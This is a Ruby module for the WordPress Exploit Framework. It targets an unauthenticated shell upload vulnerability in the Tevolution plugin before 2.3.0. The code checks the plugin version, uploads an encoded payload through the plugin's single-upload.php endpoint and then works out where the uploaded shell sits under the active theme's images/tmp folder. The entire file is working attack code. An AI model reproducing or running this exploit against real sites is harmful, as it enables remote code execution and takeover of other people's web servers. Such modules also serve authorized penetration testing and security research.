# frozen_string_literal: true

class Wpxf::Exploit::TevolutionShellUpload < Wpxf::Module
  include Wpxf::WordPress::ShellUpload

  def initialize
    super

    update_info(
      name: 'Tevolution < 2.3.0 Shell Upload',
      author: [
        'rastating'  # WPXF module
      ],
      references: [
        ['WPVDB', '8482'],
        ['URL', 'https://templatic.com/news/security-vulnerability-found-themes/']
      ],
      date: 'Apr 23 2016'
    )
  end

  def check
    change_log = normalize_uri(plugin_url, 'change_log.txt')
    check_version_from_custom_file(change_log, /\(Version\s(\d\.\d\.\d)\)/, '2.3.0')
  end

  def plugin_url
    normalize_uri(wordpress_url_plugins, 'Tevolution')
  end

  def uploader_url
    normalize_uri(plugin_url, 'tmplconnector', 'monetize', 'templatic-custom_fields', 'single-upload.php')
  end

  def payload_body_builder
    builder = Utility::BodyBuilder.new
    builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name)
    builder
  end

  def scrape_current_theme
    res = execute_get_request(url: full_uri)
    res.body[/\/#{wp_content_dir}\/themes\/(.*?)\//, 1] if res && res.body
  end

  def uploaded_payload_location
    theme = scrape_current_theme
    normalize_uri(wordpress_url_themes, theme, 'images', 'tmp', payload_name)
  end
end
